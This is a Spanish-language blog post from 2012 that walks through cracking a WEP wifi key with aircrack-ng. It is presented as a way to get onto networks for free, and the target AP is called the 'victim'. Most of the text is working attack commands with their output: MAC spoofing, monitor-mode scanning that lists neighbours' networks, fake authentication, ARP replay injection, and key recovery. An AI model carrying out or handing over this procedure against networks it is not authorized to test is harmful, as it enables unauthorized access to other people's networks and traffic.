Como descifrar claves de red wifi WEP gratis

domingo, septiembre 02, 2012 Publicado por: Oscar Meza



Aunque la seguridad a través de redes wifi WEP esta siendo sustituida por WPA/WPA2 hay varios proveedores de enlaces residenciales que siguen utilizándola para sus equipos de comunicación, que es el caso de la empresa Claro en mi país, por lo cual cada vez hay mas y mas equipos WEP regados por allí.

Romper, crackear o descifrar claves de redes wifi WEP es relativamente facil...

Que necesitamos?

1. Que la red a la que queremos conectarnos este relativamente cerca, la inyección de paquetes no funcionara si la señal que nos llega es pobre :( personalmente he probado este metodo con señales de buena a excelentes.

2. Software para romper las claves WEP, personalmente uso aircrack ya que utilizo Linux y es el que utilizare en este caso :)

3. Una tarjeta que pueda inyectar paquetes, la tarjeta intel que  trae mi laptop no lo puede hacer, por lo que utilizo una TP-LINK TL-WN422G High-Gain, que es muy barata y anda por los $22.00, podemos ver un listado de tarjetas compatibles con aircrack en este link http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

Manos a la obra!!!

Lo primero que hago es bajar mi tarjeta inalambrica


# ifconfig wlan0 down

Luego utilizo macchanger para cambiar la macaddress de mi tarjeta :)

# macchanger --mac 00:11:22:33:44:55 wlan0

Current MAC: f4:ec:38:8a:37:03 (unknown)
Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)

Pongo mi tarjeta en modo de monitoreo y la levanto

# iwconfig wlan0 mode monitor
# ifconfig wlan0 up

Escaneamos que redes estan disponibles en mi area, en este caso tengo un AP con ssid nexxt que es al que nos conectaremos, para el escaneo utilizo el siguiente comando:

# airodump-ng wlan0

El cual me retornara algo parecido a lo siguiente donde veo la todas las redes cercanas entre las que esta nexxt

 CH 12 ][ Elapsed: 36 s ][ 2012-09-02 06:17

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:FA:0A:72   -1        0        0    0 108  -1                    
 08:10:74:39:1C:7A  -56       60        0    0   1  54   WEP  WEP         nexxt
 00:24:17:B7:39:B5  -56       36        0    0   1  54   WEP  WEP         TURBONETT
 00:24:17:B6:F6:27  -62       40        0    0   1  54   WEP  WEP         TURBONETT
 00:24:17:B7:11:83  -73        9        0    0   1  54   WEP  WEP         TURBONETT
 80:C6:AB:AE:52:B9  -74       73        0    0  11  54e  WEP  WEP         TURBONETT_758
 38:72:C0:85:3C:9A  -83        9        0    0   1  54   WEP  WEP         MundoMario
 14:D6:4D:2F:CA:06  -87       27        0    0   6  54e. WPA2 CCMP   PSK  tacoloco
 00:21:91:4D:87:D4  -87       17        0    0   6  54e  WEP  WEP         FVilleda

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:90:D0:FA:0A:72  E0:B9:BA:A6:FA:B8  -81    0 -11      0        3
 38:72:C0:85:3C:9A  18:60:C0:85:3C:9A  -84    0 - 1      0        1
 00:21:91:4D:87:D4  00:21:91:4D:56:F0  -87    0 - 1      0        1

Iniciamos la captura de paquetes con el siguiente comando, "-c 1" es el canal en el que esta transmitiendo nuestro AP victima, "-w nexxt" es el archivo en el que se guardara la captura, "--bssid ..." es la macaddress del AP que deseamos crackear este dato lo averiguamos con el comando anterior.

# airodump-ng -c 1 -w nexxt --bssid 08:10:74:39:1C:7A wlan0

Lo cual nos retornara un resultado dinámico como el siguiente:

 CH  1 ][ Elapsed: 20 s ][ 2012-09-02 06:22

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 08:10:74:39:1C:7A  -72 100      216       11    0   1  54   WEP  WEP         nexxt

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes



Abrimos una segunda terminal y ejecutamos el siguiente comando:


# aireplay-ng -1 0 -a 08:10:74:39:1C:7A -h 00:11:22:33:44:55 -e nexxt wlan0

Que me retorna el siguiente resultado, aqui lo importante es que al final reporte que la asociación a sido exitosa...

06:24:25  Waiting for beacon frame (BSSID: 08:10:74:39:1C:7A) on channel 1

06:24:25  Sending Authentication Request (Open System) [ACK]
06:24:25  Authentication successful
06:24:25  Sending Association Request [ACK]
06:24:25  Association successful :-) (AID: 1)

Luego en esa misma terminal ejecutamos el siguiente comando, "-h ..." es la macaddress falsa que pusimos a nuestra tarjeta wifi...

# aireplay-ng -3 -b 08:10:74:39:1C:7A -h 00:11:22:33:44:55 wlan0

El cual retorna un resultado dinámico como el siguiente:

06:26:08  Waiting for beacon frame (BSSID: 08:10:74:39:1C:7A) on channel 1
Saving ARP requests in replay_arp-0902-062608.cap
You should also start airodump-ng to capture replies.

Con el comando anterior iniciamos la inyección de paquetes lo que permitirá capturar paquetes de manera mas rápida que utilizaremos luego para descifrar la clave, en la primera terminal que es donde estamos capturando los paquetes debemos fijarnos en la columna Data, allí deberíamos de tener un mínimo de 10000 paquetes para iniciar el descifrado.

Una vez tenemos suficientes paquetes iniciamos el descifrado con el siguiente comando:

# aircrack-ng -b 08:10:74:39:1C:7A nexxt-01.cap

nexx-01.cap es el archivo donde se han guardado los paquetes, luego de unos segundos deberíamos tener un resultado como el siguiente en el cual nos revela la clave que en este caso es "hola1"... :)

Opening nexxt-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 81051 ivs.
                     KEY FOUND! [ 68:6F:6C:61:31 ] (ASCII: hola1 )
        Decrypted correctly: 100%


La imagen siguiente muestra los pasos  anteriores:





Otros links relacionados:

Al intentar instalar Aircrack 1.1 obtengo el error "linux.c:165:17: error: variable 'unused' set but not used [-Werror=unused-but-set-variable]"

0 comentarios: